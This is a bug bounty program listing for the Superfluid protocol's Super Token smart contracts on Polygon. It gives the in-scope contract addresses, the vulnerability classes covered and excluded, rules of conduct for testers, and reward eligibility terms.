Superfluid protocol provides an ERC20 compatible token standard called Super Token
, that allows tokens to do more, namely money streaming, money distribution and on-chain cashflow automations (aka. Super App Framework).
In Scope
Target | Type | Severity | Reward |
---|---|---|---|
https://polygonscan.com/address/0xE0cc76334405EE8b39213E620587d815967af39CResolver |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x3E14dC1b13c488a8d5D310918780c983bD5982E7Host |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x3ad3f7a0965ce6f9358ad5cce86bc2b05f1ee087Governance |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x6EeE6060f715257b970700bc2656De21dEdF074CcFAv1 |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0xB0aABBA4B2783A72C52956CDEF62d438ecA2d7a1IDAv1 |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x2C90719f25B10Fc5646c82DA3240C76Fa5BcCF34SuperTokenFactory |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x15F0Ca26781C3852f8166eD2ebce5D18265cceb7SuperfluidLoader v1 |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x1b18770E5198983AF04B3735d01E09A57d27bD43TOGA |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x3aD736904E9e65189c3000c7DD2c8AC8bB7cD4e3MATICx - SETH Super Token |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x27e1e4E6BC79D93032abef01025811B7E4727e85ETHx - Super Token Wrapper |
Smart Contract | Critical | Bounty |
https://polygonscan.com/address/0x263026e7e53dbfdce5ae55ade22493f828922965RIC - Custom Super Token |
Smart Contract | Critical | Bounty |
IN-SCOPE: SMART CONTRACT VULNERABILITIES
We are looking for evidence and reasons for incorrect behavior of the smart contract, which could cause unintended functionality:
- Stealing or loss of funds
- Unauthorized transaction
- Transaction manipulation
- Attacks on logic (behavior of the code is different from the business description)
- Reentrancy
- Reordering
- Over and underflows
OUT OF SCOPE: SMART CONTRACT VULNERABILITIES
- Incorrect data supplied by third party oracles
- Not to exclude oracle manipulation/flash loan attacks
- Basic economic governance attacks (e.g. 51% attack)
- Lack of liquidity
- Best practice critiques
- Sybil attacks
- Spam attacks
- Centralization risks
- Issues without proof of concept are out of scope
The following known issues are considered to be out of scope:
- Gas griefing specifically by spam attacks
- Gas griefing specifically in SuperApp termination callbacks
- Re-entrance issues:
- SuperApp framework allowing callbacks
- Super Token is ERC-777, which also allows callbacks
- Avoid using web application scanners for automatic vulnerability searching which generates massive traffic
- Make every effort not to damage or restrict the availability of products, services, or infrastructure
- Avoid compromising any personal data, interruption, or degradation of any service
- Don’t access or modify other user data, localize all tests to your accounts
- Perform testing only within the scope
- Don’t exploit any DoS/DDoS vulnerabilities, social engineering attacks, or spam
- Don’t spam forms or account creation flows using automated scanners
- In case you find chain vulnerabilities we’ll pay only for vulnerability with the highest severity.
- Don’t break any law and stay in the defined scope
- Any details of found vulnerabilities must not be communicated to anyone who is not a HackenProof Team or an authorized employee of this Company without appropriate permission
- Do not discuss this program or any vulnerabilities (even resolved ones) outside of the program without express consent from the organization
- No vulnerability disclosure, including partial is allowed for the moment.
- Please do NOT publish/discuss bugs
We are happy to thank everyone who submits valid reports which help us improve the security. However, only those that meet the following eligibility requirements may receive a monetary reward:
- You must be the first reporter of a vulnerability.
- The vulnerability must be a qualifying vulnerability
- Any vulnerability found must be reported no later than 24 hours after discovery and exclusively through hackenproof.com
- You must send a clear textual description of the report along with steps to reproduce the issue, include attachments such as screenshots or proof of concept code as necessary.
- You must not be a former or current employee of us or one of its contractor.
- ONLY USE YOUR HackerProof ADDRESS (in case of violation, no bounty can be awarded)
- Provide detailed but to-the point reproduction steps